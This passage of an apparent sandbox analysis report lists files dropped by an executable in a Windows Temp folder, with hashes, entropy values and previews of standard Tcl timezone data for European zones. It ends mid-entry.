                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Paris) {. {-9223372036854775808 561 0 LMT}. {-2486678901 561 0 PMT}. {-1855958901 0 0 WET}. {-1689814800 3600 1 WEST}. {-1680397200 0 0 WET}. {-1665363600 3600 1 WEST}. {-1648342800 0 0 WET}. {-1635123600 3600 1 WEST}. {-1616893200 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585443600 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1470618000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1253494800 3600 1 WEST}. {-1238374800 0 0 W
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.86256001696314
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Podgorica) $TZData(:Europe/Belgrade).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7684
                                                                                                                                                                                                                                                    Entropy (8bit):3.7339342503071604
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Prague) {. {-9223372036854775808 3464 0 LMT}. {-3786829064 3464 0 PMT}. {-2469401864 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-798073200 3600 0 CET}. {-780534000 7200 1 CEST}. {-761180400 3600 0 CET}. {-746578800 7200 1 CEST}. {-733359600 3600 0 CET}. {-716425200 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {-654217200 7200 1 CEST}. {-639010800 3600 0 CET}. {283993200 3600 0 CET}. {291776400 7200 1 CEST}. {307501200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7400
                                                                                                                                                                                                                                                    Entropy (8bit):3.686652767751974
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Riga) {. {-9223372036854775808 5794 0 LMT}. {-2840146594 5794 0 RMT}. {-1632008194 9394 1 LST}. {-1618702594 5794 0 RMT}. {-1601681794 9394 1 LST}. {-1597275394 5794 0 RMT}. {-1377308194 7200 0 EET}. {-928029600 10800 0 MSK}. {-899521200 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-795834000 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 10800 1 EEST}. {622598
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8481
                                                                                                                                                                                                                                                    Entropy (8bit):3.7293906313259404
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Rome) {. {-9223372036854775808 2996 0 LMT}. {-3259097396 2996 0 RMT}. {-2403564596 3600 0 CET}. {-1690851600 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1664758800 7200 1 CEST}. {-1649034000 3600 0 CET}. {-1635123600 7200 1 CEST}. {-1616979600 3600 0 CET}. {-1604278800 7200 1 CEST}. {-1585530000 3600 0 CET}. {-1571014800 7200 1 CEST}. {-1555290000 3600 0 CET}. {-932432400 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-804819600 3600 0 CET}. {-798080400 3600 0 CET}. {-781052400 7200 1 CEST}. {-766717200 3600 0 CET}. {-750898800 7200 1 CEST}. {-733359600 3600 0 CET}. {-719456400 7200 1 CEST}. {-701917200 3600 0 CET}. {-689209200 7200 1 CEST}. {-670460400 3600 0 CET}. {-114051600 7200 1 CEST}. {-103168800 3600 0 CET}. {-81997200 7200 1 CEST}. {-71719200 3600 0 CET
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2143
                                                                                                                                                                                                                                                    Entropy (8bit):3.9497188371895082
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Samara) {. {-9223372036854775808 12020 0 LMT}. {-1593825620 10800 0 SAMT}. {-1247540400 14400 0 SAMT}. {-1102305600 14400 0 KUYMMTT}. {354916800 18000 1 KUYST}. {370724400 14400 0 KUYT}. {386452800 18000 1 KUYST}. {402260400 14400 0 KUYT}. {417988800 18000 1 KUYST}. {433796400 14400 0 KUYT}. {449611200 18000 1 KUYST}. {465343200 14400 0 KUYT}. {481068000 18000 1 KUYST}. {496792800 14400 0 KUYT}. {512517600 18000 1 KUYST}. {528242400 14400 0 KUYT}. {543967200 18000 1 KUYST}. {559692000 14400 0 KUYT}. {575416800 18000 1 KUYST}. {591141600 14400 0 KUYT}. {606866400 10800 0 MSD}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {638319600 14400 1 MSD}. {654649200 10800 0 MSK}. {670374000 7200 0 EEMMTT}. {670377600 10800 1 EEST}. {686102400 10800 0 KUYT}. {687916800 14400 0 SAMT}. {701809200 18000 1 SAMST}. {717530400 14400 0 SAMT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.908962717024613
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Rome)]} {. LoadTimeZoneFile Europe/Rome.}.set TZData(:Europe/San_Marino) $TZData(:Europe/Rome).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.890934294125181
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Sarajevo) $TZData(:Europe/Belgrade).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2307
                                                                                                                                                                                                                                                    Entropy (8bit):3.8673720237532523
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Simferopol) {. {-9223372036854775808 8184 0 LMT}. {-2840148984 8160 0 SMT}. {-1441160160 7200 0 EET}. {-1247536800 10800 0 MSK}. {-888894000 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-811645200 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {646786800 7200 0 EET}. {694216800 7200 0 EET}. {701820000 10800 1 EEST}. {71754
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.906520812033373
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQawOgpr8QahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vq3
                                                                                                                                                                                                                                                    MD5:BB062D4D5D6EA9BA172AC0555227A09C
                                                                                                                                                                                                                                                    SHA1:75CCA7F75CEB77BE5AFB02943917DB048051F396
                                                                                                                                                                                                                                                    SHA-256:51820E2C5938CEF89A6ED2114020BD32226EF92102645526352E1CB7995B7D0A
                                                                                                                                                                                                                                                    SHA-512:8C6AD79DD225C566D2D93606575A1BF8DECF091EDFEED1F10CB41C5464A6A9F1C15BEB4957D76BD1E03F5AE430319480A3FDACEF3116EA2AF0464427468BC855
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Skopje) $TZData(:Europe/Belgrade).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7396
                                                                                                                                                                                                                                                    Entropy (8bit):3.6373782291014924
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:8lAV/6vcBrYixX21/BVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykePG:8lAV/SEm1/mh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:8B538BB68A7FF0EB541EB2716264BAD9
                                                                                                                                                                                                                                                    SHA1:49899F763786D4E7324CC5BAAECFEA87D5C4F6C7
                                                                                                                                                                                                                                                    SHA-256:9D60EF4DBA6D3802CDD25DC87E00413EC7F37777868C832A9E4963E8BCDB103C
                                                                                                                                                                                                                                                    SHA-512:AD8D75EE4A484050BB108577AE16E609358A9E4F31EA1649169B4A26C8348A502B4135FE3A282A2454799250C6EDF9E70B236BCF23E1F6540E123E39E81BBE41
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Sofia) {. {-9223372036854775808 5596 0 LMT}. {-2840146396 7016 0 IMT}. {-2369527016 7200 0 EET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-781048800 7200 0 EET}. {291762000 10800 0 EEST}. {307576800 7200 0 EET}. {323816400 10800 1 EEST}. {339026400 7200 0 EET}. {355266000 10800 1 EEST}. {370393200 7200 0 EET}. {386715600 10800 1 EEST}. {401846400 7200 0 EET}. {417571200 10800 1 EEST}. {433296000 7200 0 EET}. {449020800 10800 1 EEST}. {465350400 7200 0 EET}. {481075200 10800 1 EEST}. {496800000 7200 0 EET}. {512524800 10800 1 EEST}. {528249600 7200 0 EET}. {543974400 10800 1 EEST}. {559699200 7200 0 EET}. {575424000 10800 1 EEST}. {591148800 7200 0 EET}. {606873600 10800 1 EEST}. {622598400 7200 0 EET}. {638323200 10
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7058
                                                                                                                                                                                                                                                    Entropy (8bit):3.730067397634837
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:K39ucRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:K3HRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:7F6C45358FC5E91125ACBDD46BBD93FE
                                                                                                                                                                                                                                                    SHA1:C07A80D3C136679751D64866B725CC390D73B750
                                                                                                                                                                                                                                                    SHA-256:119E9F7B1284462EB8E920E7216D1C219B09A73B323796BBF843346ECD71309A
                                                                                                                                                                                                                                                    SHA-512:585AE0B1DE1F5D31E45972169C831D837C19D05E21F65FAD3CB84BEF8270C31BF2F635FB803CB70C569FAC2C8AA6ABDE057943F4B51BF1D73B72695FE95ECFD2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Stockholm) {. {-9223372036854775808 4332 0 LMT}. {-2871681132 3614 0 SET}. {-2208992414 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680483600 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7295
                                                                                                                                                                                                                                                    Entropy (8bit):3.6772204206246193
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:dcqDyurGXl6V/DraKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:e7GG16gh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:981078CAEAA994DD0C088B8C4255018A
                                                                                                                                                                                                                                                    SHA1:5B5E542491FCCC80B04F6F3CA3BA76FEE35BC207
                                                                                                                                                                                                                                                    SHA-256:716CFFE58847E0084C904A01EF4230F63275660691A4BA54D0B80654E215CC8F
                                                                                                                                                                                                                                                    SHA-512:3010639D28C7363D0B787F84EF57EE30F457BD8A6A64AEDED1E813EB1AF0A8D85DA0A788C810509F932867F7361B338753CC9B79ACA95D2D32A77F7A8AA8BC9F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Tallinn) {. {-9223372036854775808 5940 0 LMT}. {-2840146740 5940 0 TMT}. {-1638322740 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1593824400 5940 0 TMT}. {-1535938740 7200 0 EET}. {-927943200 10800 0 MSK}. {-892954800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-797648400 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 10800 1 EEST}. {622598400 7200 0 EET}. {638
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7412
                                                                                                                                                                                                                                                    Entropy (8bit):3.7216700074911437
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:6t1WXXRM8DAdRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:6GXh9AdRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:872AB00046280F53657A47D41FBA5EFE
                                                                                                                                                                                                                                                    SHA1:311BF2342808BD9DC8AB2C2856A1F91F50CFB740
                                                                                                                                                                                                                                                    SHA-256:D02C2CD894AE4D3C2619A4249088A566B02517FA3BF65DEFAF4280C407E5B5B3
                                                                                                                                                                                                                                                    SHA-512:2FF901990FA8D6713D875F90FE611E54B35A2216C380E88D408C4FB5BD06916EE804DC6331C117C3AC643731BEADB5BDEDEA0F963B89FAEDB07CA3FFD0B3A535
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Tirane) {. {-9223372036854775808 4760 0 LMT}. {-1767230360 3600 0 CET}. {-932346000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-843519600 3600 0 CET}. {136854000 7200 1 CEST}. {149896800 3600 0 CET}. {168130800 7200 1 CEST}. {181432800 3600 0 CET}. {199839600 7200 1 CEST}. {213141600 3600 0 CET}. {231894000 7200 1 CEST}. {244591200 3600 0 CET}. {263257200 7200 1 CEST}. {276040800 3600 0 CET}. {294706800 7200 1 CEST}. {307490400 3600 0 CET}. {326156400 7200 1 CEST}. {339458400 3600 0 CET}. {357087600 7200 1 CEST}. {370389600 3600 0 CET}. {389142000 7200 1 CEST}. {402444000 3600 0 CET}. {419468400 7200 1 CEST}. {433807200 3600 0 CET}. {449622000 7200 1 CEST}. {457480800 7200 0 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.85845283098493
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV+NM/LpVAIgoq9NM/eO6yQa3MPgJM1p8QagNM/cn:SlSWB9IZaM3ymI6NVAIgoI6eFytM4M8g
                                                                                                                                                                                                                                                    MD5:743453106E8CD7AE48A2F575255AF700
                                                                                                                                                                                                                                                    SHA1:7CD6F6DCA61792B4B2CBF6645967B9349ECEACBE
                                                                                                                                                                                                                                                    SHA-256:C28078D4B42223871B7E1EB42EEB4E70EA0FED638288E9FDA5BB5F954D403AFB
                                                                                                                                                                                                                                                    SHA-512:458072C7660BEAFEB9AE5A2D3AEA6DA582574D80193C89F08A57B17033126E28A175F5B6E2990034660CAE3BC1E837F8312BC4AA365F426BD54588D0C5A12EB8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Chisinau)]} {. LoadTimeZoneFile Europe/Chisinau.}.set TZData(:Europe/Tiraspol) $TZData(:Europe/Chisinau).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7287
                                                                                                                                                                                                                                                    Entropy (8bit):3.681086026612126
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Uzhgorod) {. {-9223372036854775808 5352 0 LMT}. {-2500939752 3600 0 CET}. {-946774800 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796870800 7200 1 CEST}. {-794714400 3600 0 CET}. {-773456400 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {646786800 3600 0 CET}. {670384800 7200 0 EET}. {694216800
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.906311228352029
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Zurich)]} {. LoadTimeZoneFile Europe/Zurich.}.set TZData(:Europe/Vaduz) $TZData(:Europe/Zurich).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):171
                                                                                                                                                                                                                                                    Entropy (8bit):4.8663121336740405
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Rome)]} {. LoadTimeZoneFile Europe/Rome.}.set TZData(:Europe/Vatican) $TZData(:Europe/Rome).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7659
                                                                                                                                                                                                                                                    Entropy (8bit):3.7322931990772257
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Vienna) {. {-9223372036854775808 3921 0 LMT}. {-2422055121 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1577926800 3600 0 CET}. {-1569711600 7200 1 CEST}. {-1555801200 3600 0 CET}. {-938905200 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-780188400 3600 0 CET}. {-757386000 3600 0 CET}. {-748479600 7200 1 CEST}. {-733359600 3600 0 CET}. {-717634800 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {323823600 7200 1 CEST}. {338940000 3600 0 CET}. {347151600 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7203
                                                                                                                                                                                                                                                    Entropy (8bit):3.687252441677403
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Vilnius) {. {-9223372036854775808 6076 0 LMT}. {-2840146876 5040 0 WMT}. {-1672536240 5736 0 KMT}. {-1585100136 3600 0 CET}. {-1561251600 7200 0 EET}. {-1553565600 3600 0 CET}. {-928198800 10800 0 MSK}. {-900126000 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-802141200 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {638319600 14400 1 MSD}. {65464
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2036
